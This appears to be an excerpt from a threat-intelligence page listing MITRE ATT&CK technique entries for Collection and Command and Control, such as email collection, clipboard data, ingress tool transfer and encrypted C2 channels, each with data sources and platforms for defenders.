Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre